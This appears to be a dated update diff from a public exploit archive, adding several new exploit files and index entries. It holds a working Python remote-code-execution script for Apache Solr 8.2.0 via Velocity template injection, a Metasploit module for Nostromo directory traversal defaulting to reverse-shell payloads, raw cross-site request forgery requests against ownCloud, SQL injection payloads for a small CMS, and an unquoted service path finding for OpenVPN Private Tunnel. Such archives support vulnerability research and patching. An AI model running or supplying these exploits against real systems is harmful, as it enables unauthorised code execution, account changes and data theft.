DB: 2019-11-02

7 changes to exploits/shellcodes

OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path

Nostromo - Directory Traversal Remote Command Execution (Metasploit)
TheJshen contentManagementSystem 1.04 - 'id' SQL Injection
ownCloud 10.3.0 stable - Cross-Site Request Forgery
Apache Solr 8.2.0 - Remote Code Execution

exploits/java/webapps/47572.py

@@ -0,0 +1,195 @@
+# Title: Apache Solr 8.2.0 - Remote Code Execution
+# Date: 2019-11-01
+# Author: @l3x_wong
+# Vendor: https://lucene.apache.org/solr/
+# Software Link: https://lucene.apache.org/solr/downloads.html
+# CVE: N/A
+# github: https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template
+
+# usage: python3 script.py ip [port [command]]
+#                default port=8983
+#                default command=whoami
+# note:
+# Step1: Init Apache Solr Configuration
+# Step2: Remote Exec in Every Solr Node
+
+import sys
+import json
+import time
+import requests
+
+
+class initSolr(object):
+
+    timestamp_s = str(time.time()).split('.')
+    timestamp = timestamp_s[0] + timestamp_s[1][0:-3]
+
+    def __init__(self, ip, port):
+        self.ip = ip
+        self.port = port
+
+    def get_nodes(self):
+        payload = {
+            '_': self.timestamp,
+            'indexInfo': 'false',
+            'wt': 'json'
+        }
+        url = 'http://' + self.ip + ':' + self.port + '/solr/admin/cores'
+
+        try:
+            nodes_info = requests.get(url, params=payload, timeout=5)
+            node = list(nodes_info.json()['status'].keys())
+            state = 1
+        except:
+            node = ''
+            state = 0
+
+        if node:
+            return {
+                'node': node,
+                'state': state,
+                'msg': 'Get Nodes Successfully'
+            }
+        else:
+            return {
+                'node': None,
+                'state': state,
+                'msg': 'Get Nodes Failed'
+            }
+
+    def get_system(self):
+        payload = {
+            '_': self.timestamp,
+            'wt': 'json'
+        }
+        url = 'http://' + self.ip + ':' + self.port + '/solr/admin/info/system'
+        try:
+            system_info = requests.get(url=url, params=payload, timeout=5)
+            os_name = system_info.json()['system']['name']
+            os_uname = system_info.json()['system']['uname']
+            os_version = system_info.json()['system']['version']
+            state = 1
+
+        except:
+            os_name = ''
+            os_uname = ''
+            os_version = ''
+            state = 0
+
+        return {
+            'system': {
+                'name': os_name,
+                'uname': os_uname,
+                'version': os_version,
+                'state': state
+            }
+        }
+
+
+class apacheSolrRCE(object):
+
+    def __init__(self, ip, port, node, command):
+        self.ip = ip
+        self.port = port
+        self.node = node
+        self.command = command
+        self.url = "http://" + self.ip + ':' + self.port + '/solr/' + self.node
+
+    def init_node_config(self):
+        url = self.url + '/config'
+        payload = {
+            'update-queryresponsewriter': {
+                'startup': 'lazy',
+                'name': 'velocity',
+                'class': 'solr.VelocityResponseWriter',
+                'template.base.dir': '',
+                'solr.resource.loader.enabled': 'true',
+                'params.resource.loader.enabled': 'true'
+            }
+        }
+        try:
+            res = requests.post(url=url, data=json.dumps(payload), timeout=5)
+            if res.status_code == 200:
+                return {
+                    'init': 'Init node config successfully',
+                    'state': 1
+                }
+            else:
+                return {
+                    'init': 'Init node config failed',
+                    'state': 0
+                }
+        except:
+            return {
+                'init': 'Init node config failed',
+                'state': 0
+            }
+
+    def rce(self):
+        url = self.url + ("/select?q=1&&wt=velocity&v.template=custom&v.template.custom="
+                          "%23set($x=%27%27)+"
+                          "%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+"
+                          "%23set($chr=$x.class.forName(%27java.lang.Character%27))+"
+                          "%23set($str=$x.class.forName(%27java.lang.String%27))+"
+                          "%23set($ex=$rt.getRuntime().exec(%27" + self.command +
+                          "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+"
+                          "%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end")
+        try:
+            res = requests.get(url=url, timeout=5)
+            if res.status_code == 200:
+                try:
+                    if res.json()['responseHeader']['status'] == '0':
+                        return 'RCE failed @Apache Solr node %s\n' % self.node
+                    else:
+                        return 'RCE failed @Apache Solr node %s\n' % self.node
+                except:
+                    return 'RCE Successfully @Apache Solr node %s\n %s\n' % (self.node, res.text.strip().strip('0'))
+
+            else:
+                return 'RCE failed @Apache Solr node %s\n' % self.node
+        except:
+            return 'RCE failed @Apache Solr node %s\n' % self.node
+
+
+def check(ip, port='8983', command='whoami'):
+    system = initSolr(ip=ip, port=port)
+    if system.get_nodes()['state'] == 0:
+        print('No Nodes Found. Remote Exec Failed!')
+    else:
+        nodes = system.get_nodes()['node']
+        systeminfo = system.get_system()
+        os_name = systeminfo['system']['name']
+        os_version = systeminfo['system']['version']
+        print('OS Realese: %s, OS Version: %s\nif remote exec failed, '
+              'you should change your command with right os platform\n' % (os_name, os_version))
+
+        for node in nodes:
+            res = apacheSolrRCE(ip=ip, port=port, node=node, command=command)
+            init_node_config = res.init_node_config()
+            if init_node_config['state'] == 1:
+                print('Init node %s Successfully, exec command=%s' % (node, command))
+                result = res.rce()
+                print(result)
+            else:
+                print('Init node %s Failed, Remote Exec Failed\n' % node)
+
+
+if __name__ == '__main__':
+    usage = ('python3 script.py ip [port [command]]\n '
+             '\t\tdefault port=8983\n '
+             '\t\tdefault command=whoami')
+
+    if len(sys.argv) == 4:
+        ip = sys.argv[1]
+        port = sys.argv[2]
+        command = sys.argv[3]
+        check(ip=ip, port=port, command=command)
+    elif len(sys.argv) == 3:
+        ip = sys.argv[1]
+        port = sys.argv[2]
+        check(ip=ip, port=port)
+    elif len(sys.argv) == 2:
+        ip = sys.argv[1]
+        check(ip=ip)
+    else:
+        print('Usage: %s:\n' % usage)

exploits/linux/webapps/47571.txt

@@ -0,0 +1,280 @@
+# Exploit Title: ownCloud 10.3.0 stable - Cross-Site Request Forgery
+# Date: 2019-10-31
+# Exploit Author: Ozer Goker
+# Vendor Homepage: https://owncloud.org
+# Software Link: https://owncloud.org/download/
+# Version: 10.3
+# CVE: N/A
+
+# Introduction
+# Your personal cloud collaboration platform With over 50 million users
+# worldwide, ownCloud is the market-leading open source software for
+# cloud-based collaboration platforms. As an alternative to Dropbox, OneDrive
+# and Google Drive, ownCloud offers real data security and privacy for you
+# and your data.
+
+##################################################################################################################################
+
+# CSRF1
+# Create Folder
+
+MKCOL /remote.php/dav/files/user/test HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+requesttoken:
+VREONXtUByUsCkMAcRscHjUGHjYGPBoHJQgsfzoHWEk=:fUCe0mdAzn0T3MNKlKqYMEBFcezMTukbmbVeDs+jKlo=
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+
+##################################################################################################################################
+
+# CSRF2
+# Delete Folder
+
+DELETE /remote.php/dav/files/user/test HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+requesttoken:
+HDQcAi5jLSkkKysEGiYxZSA7PhcaCWEYFydhQ106YEM=:/pQReZNMrOXPXpc0yvQxQp9YQJ7q3HShA9D2+R2EJuI=
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+
+##################################################################################################################################
+
+# CSRF3
+# Create User
+
+POST /index.php/settings/users/users HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+eRIlHRIBJF0jU1w9CSY+AT8CX18gTh90JV8UQwQdfEg=:JVhMY8G9u7/iKplTfO00k7G5c2BqjoOcCWkAHYdZV5I=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 39
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+username=test&password=&email=test@test
+
+
+
+##################################################################################################################################
+
+# CSRF4
+# Delete User
+
+DELETE /index.php/settings/users/users/test HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+BQ8vIjp9LjACFxwEB2QkMSsuG14kHy4SKio6URckUlk=:6KbrqDMTTsoPE2vdrct1ofvSlGlcyVarSAOFV9PFuLQ=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+
+##################################################################################################################################
+
+# CSRF5
+# Create Group
+
+POST /index.php/settings/users/groups HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+BRd8ZDsAFREkB0YxdAIaYi8/ABsyCBIDExs/Wgw9a28=:6S14p9vurc5e6TH7vrotyqJBUvihbOXDUWMKYbS23UU=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 7
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+id=test
+
+
+##################################################################################################################################
+
+# CSRF6
+# Delete Group
+
+DELETE /index.php/settings/users/groups/test HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+aTElBwBqTAUYEEQacjdgER4hJ0QIA20sdF00CwtHUm0=:ZuhWKS/aNt7N0a2DGlH+Cz5m20b9e5aFOSBKkqJOALw=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+
+##################################################################################################################################
+
+# CSRF7
+# Change User Full Name
+
+POST /index.php/settings/users/user/displayName HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+fzYYPjtaVBUeKj8CBzojJHIgXTkTTT4GbR0vBT4TCm0=:LrUnpc7qHNLVElqq+m2VX4fG+py7Pa9FK8DpB84dSdY=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 37
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+displayName=user1&oldDisplayName=user
+
+
+##################################################################################################################################
+
+# CSRF8
+# Change User Email
+
+PUT /index.php/settings/users/user/mailAddress HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+QAkuGRpIMg88IzsXBTMeYREpCA4zLhcQHiMsQBo7WWo=:sMcIQqQkjGHCGeL4HdgaxWOQXNzrtIjAou6akezvpcI=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 31
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+mailAddress=user1%40example.com
+
+
+##################################################################################################################################
+
+# CSRF9
+# Change User Password
+
+
+POST /index.php/settings/personal/changepassword HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 62
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+oldpassword=1234&personal-password=1&personal-password-clone=1
+
+
+##################################################################################################################################
+
+# CSRF10
+# Change Language
+
+POST /index.php/settings/ajax/setlanguage.php HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 7
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+lang=tr
+
+
+##################################################################################################################################

exploits/multiple/remote/47573.rb

@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Nostromo Directory Traversal Remote Command Execution',
+      'Description'    => %q{
+          This module exploits a remote command execution vulnerability in
+        Nostromo <= 1.9.6. This issue is caused by a directory traversal
+        in the function `http_verify` in nostromo nhttpd allowing an attacker
+        to achieve remote code execution via a crafted HTTP request.
+      },
+      'Author'         =>
+        [
+          'Quentin Kaiser <kaiserquentin[at]gmail.com>', # metasploit module
+          'sp0re', # original public exploit
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2019-16278'],
+          [ 'URL', 'https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html'],
+        ],
+      'Platform'      => ['linux', 'unix'], # OpenBSD, FreeBSD, NetBSD, and Linux
+      'Arch'  => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
+      'Targets'        =>
+        [
+          ['Automatic (Unix In-Memory)',
+            {
+                'Platform' => 'unix',
+                'Arch'  => ARCH_CMD,
+                'Type'  => :unix_memory,
+                'DefaultOptions'  => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
+            }
+          ],
+          ['Automatic (Linux Dropper)',
+            {
+                'Platform' => 'linux',
+                'Arch'  => [ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
+                'Type'  => :linux_dropper,
+                'DefaultOptions'  => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Oct 20 2019',
+      'DefaultTarget' => 0,
+      'Notes'         => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path),
+      }
+    )
+
+    unless res
+      vprint_error("Connection failed")
+      return CheckCode::Unknown
+    end
+
+    if res.code == 200 and res.headers['Server'] =~ /nostromo [\d.]{5}/
+      /nostromo (?<version>[\d.]{5})/ =~ res.headers['Server']
+      if Gem::Version.new(version) <= Gem::Version.new('1.9.6')
+        return CheckCode::Appears
+      end
+    end
+
+    return CheckCode::Safe
+  end
+
+  def execute_command(cmd, opts = {})
+    send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri(target_uri.path, '/.%0d./.%0d./.%0d./.%0d./bin/sh'),
+      'headers' => {'Content-Length:' => '1'},
+      'data'    => "echo\necho\n#{cmd} 2>&1"
+      }
+    )
+  end
+
+  def exploit
+    # These CheckCodes are allowed to pass automatically
+    checkcodes = [
+      CheckCode::Appears,
+      CheckCode::Vulnerable
+    ]
+
+    unless checkcodes.include?(check) || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
+    print_status("Configuring #{target.name} target")
+
+    case target['Type']
+    when :unix_memory
+      print_status("Sending #{datastore['PAYLOAD']} command payload")
+      vprint_status("Generated command payload: #{payload.encoded}")
+
+      res = execute_command(payload.encoded)
+
+      if res && datastore['PAYLOAD'] == 'cmd/unix/generic'
+        print_warning('Dumping command output in full response body')
+
+        if res.body.empty?
+          print_error('Empty response body, no command output')
+          return
+        end
+
+        print_line(res.body)
+      end
+    when :linux_dropper
+      print_status("Sending #{datastore['PAYLOAD']} command stager")
+      execute_cmdstager
+    end
+  end
+end

exploits/php/webapps/47569.txt

@@ -0,0 +1,25 @@
+# Exploit Title: TheJshen contentManagementSystem 1.04 - 'id' SQL Injection
+# Date: 2019-11-01
+# Exploit Author: Cakes
+# Vendor Homepage: https://github.com/thejshen/contentManagementSystem
+# Version: 1.04
+# Software Link: https://github.com/thejshen/contentManagementSystem.git
+# Tested on: CentOS7
+
+# GET parameter 'id' easy SQL Injection
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=4' AND 5143=5143-- OWXt
+    Vector: AND [INFERENCE]
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG
+    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 5 columns
+    Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh
+    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]

exploits/unix/remote/47080.c

@@ -1,7 +1,7 @@
 /*
  * OF version r00t VERY PRIV8 spabam
  * Version: v3.0.4 
- * Requirements: libssl-dev
+ * Requirements: libssl-dev    ( apt-get install libssl-dev )
  * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
  * objdump -R /usr/sbin/httpd|grep free to get more targets
  * #hackarena irc.brasnet.org

exploits/unix/remote/764.c

@@ -1,4 +1,5 @@
 /*
+ * E-DB Note: Updated exploit ~ https://www.exploit-db.com/exploits/47080
  * E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
  *
  * OF version r00t VERY PRIV8 spabam

exploits/windows/local/47570.txt

@@ -0,0 +1,39 @@
+# Title: OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path
+# Author: Sainadh Jamalpur
+# Date: 2019-10-31
+# Vendor Homepage: https://openvpn.net/
+# Software Link: https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe
+# Version : PrivateTunnel v2.8.4
+# Tested on: Windows 10 64bit(EN)
+# CVE : N/A
+
+# =====================================================
+# 1. Description:
+# Unquoted service paths in OpenVPN Private Tunnel v2.8.4 have an unquoted service path.
+
+#PoC
+===========
+C:\>sc qc ovpnagent
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ovpnagent
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\OpenVPN
+Technologies\PrivateTunnel\ovpnagent.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : OpenVPN Agent
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>
+
+#Exploit:
+============
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other
+security applications where it could potentially be executed during
+application startup or reboot. If successful, the local user's code
+would execute with the elevated privileges of the application.

files_exploits.csv

@@ -10740,6 +10740,7 @@ id,file,description,date,author,type,platform,port
 47551,exploits/windows/local/47551.py,"ChaosPro 2.0 - Buffer Overflow (SEH)",2019-10-28,SYANiDE,local,windows,
 47556,exploits/windows/local/47556.txt,"Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path",2019-10-29,"Alberto Vargas",local,windows,
 47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows,
+47570,exploits/windows/local/47570.txt,"OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path",2019-11-01,"Sainadh Jamalpur",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17746,6 +17747,7 @@ id,file,description,date,author,type,platform,port
 47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution",2019-10-29,"Thomas Zuk",remote,windows,
 47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
 47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
+47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41886,3 +41888,6 @@ id,file,description,date,author,type,platform,port
 47561,exploits/xml/webapps/47561.txt,"Citrix StoreFront Server 7.15 - XML External Entity Injection",2019-10-30,"Vahagn Vardanyan",webapps,xml,
 47562,exploits/hardware/webapps/47562.sh,"iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure",2019-10-30,LiquidWorm,webapps,hardware,
 47567,exploits/php/webapps/47567.txt,"Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection",2019-10-31,"Princy Edward",webapps,php,
+47569,exploits/php/webapps/47569.txt,"TheJshen contentManagementSystem 1.04 - 'id' SQL Injection",2019-11-01,cakes,webapps,php,
+47571,exploits/linux/webapps/47571.txt,"ownCloud 10.3.0 stable - Cross-Site Request Forgery",2019-11-01,"Ozer Goker",webapps,linux,
+47572,exploits/java/webapps/47572.py,"Apache Solr 8.2.0 - Remote Code Execution",2019-11-01,@l3x_wong,webapps,java,